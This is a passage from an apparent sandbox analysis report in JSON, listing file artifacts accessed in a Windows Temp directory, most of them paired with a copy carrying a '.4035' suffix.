7lFSQB0g\\AppData\\Local\\Temp\\QrlfDy64irka.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\qrlfdy64irka.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGI2F2B.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgi2f2b.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGI2F2B.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgi2f2b.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGI2F2B.tmp-tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgi2f2b.tmp-tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGI2F2B.tmp-tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgi2f2b.tmp-tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIBC0F.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgibc0f.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIBC0F.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgibc0f.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIBC0F.tmp-tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgibc0f.tmp-tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIBC0F.tmp-tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgibc0f.tmp-tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIEF52.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgief52.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIEF52.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgief52.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIEF52.tmp-tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgief52.tmp-tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RGIEF52.tmp-tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rgief52.tmp-tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(2017062313015272C).log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(2017062313015272c).log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(2017062313015272C).log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(2017062313015272c).log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(2017072110084945C).log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(2017072110084945c).log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(2017072110084945C).log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(2017072110084945c).log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(201707211017014AC).log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(201707211017014ac).log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(201707211017014AC).log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(201707211017014ac).log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(201707261433297D4).log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(201707261433297d4).log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(201707261433297D4).log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(201707261433297d4).log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(20170726170319330).log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(20170726170319330).log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(20170726170319330).log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(20170726170319330).log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(2017072617140380C).log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(2017072617140380c).log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SetupExe(2017072617140380C).log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\setupexe(2017072617140380c).log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\sqEw.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\sqew.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\sqEw.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\sqew.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SzPtZIVYUvP.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\szptzivyuvp.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\SzPtZIVYUvP.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\szptzivyuvp.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\s_LcgvGEpDp21bQn.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\s_lcgvgepdp21bqn.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\s_LcgvGEpDp21bQn.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\s_lcgvgepdp21bqn.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\tbnsWPEpOzxpMIzF_w-4.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\tbnswpepozxpmizf_w-4.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\tbnsWPEpOzxpMIzF_w-4.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\tbnswpepozxpmizf_w-4.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\TpuRRU4JpnGy.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\tpurru4jpngy.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\TpuRRU4JpnGy.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\tpurru4jpngy.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\TXblOL9wEU5F81-.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\txblol9weu5f81-.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\TXblOL9wEU5F81-.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\txblol9weu5f81-.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\U0RRSs.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\u0rrss.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\U0RRSs.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\u0rrss.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Ud8gu3P8LWWR41.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ud8gu3p8lwwr41.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Ud8gu3P8LWWR41.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ud8gu3p8lwwr41.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\UDDRubP6PV8.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\uddrubp6pv8.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\UDDRubP6PV8.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\uddrubp6pv8.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\uFiWC2oo6CspLxPfRac.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ufiwc2oo6csplxpfrac.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\uFiWC2oo6CspLxPfRac.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ufiwc2oo6csplxpfrac.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\UKKJRF2oDniIkw0D.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ukkjrf2odniikw0d.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\UKKJRF2oDniIkw0D.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ukkjrf2odniikw0d.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\uxeventlog.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\uxeventlog.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\uxeventlog.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\uxeventlog.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\wGagQV0Abhcdb.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\wgagqv0abhcdb.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\wGagQV0Abhcdb.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\wgagqv0abhcdb.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\wuTxnO3y.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\wutxno3y.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\wuTxnO3y.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\wutxno3y.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ZAKW6HFumIR1tN9.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\zakw6hfumir1tn9.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ZAKW6HFumIR1tN9.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\zakw6hfumir1tn9.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\_1GzqQpQ1O7.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\_1gzqqpq1o7.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\_1GzqQpQ1O7.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\_1gzqqpq1o7.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\{1C306CB1-771E-4B4B-A902-86E897877F5B}.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\{1c306cb1-771e-4b4b-a902-86e897877f5b}.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\{1C306CB1-771E-4B4B-A902-86E897877F5B}.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\{1c306cb1-771e-4b4b-a902-86e897877f5b}.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\~DFC62DB784016E8A4F.TMP.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\~dfc62db784016e8a4f.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\~DFC62DB784016E8A4F.TMP", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\~dfc62db784016e8a4f.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\~nsu.tmp\\au_.exe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\~nsu.tmp\\au_.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\J34QD0IO\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\j34qd0io\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\J34QD0IO\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\j34qd0io\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\793TK2YX\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\793tk2yx\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\793TK2YX\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\793tk2yx\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\53XUACO8\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\53xuaco8\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\53XUACO8\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\53xuaco8\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\4PEP48KS\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\4pep48ks\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\4PEP48KS\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\4pep48ks\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\42234357-29bc-472f-be1a-21a7f646755a.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\42234357-29bc-472f-be1a-21a7f646755a.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\42234357-29bc-472f-be1a-21a7f646755a.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\42234357-29bc-472f-be1a-21a7f646755a.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\128.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\128.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\128.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\128.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\manifest.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\manifest.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\manifest.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\manifest.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\tr\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\tr\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\tr\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\tr\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\th\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\th\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\th\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\th\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sv\\messages.json.4035", "hashes": [], "norm_filename": 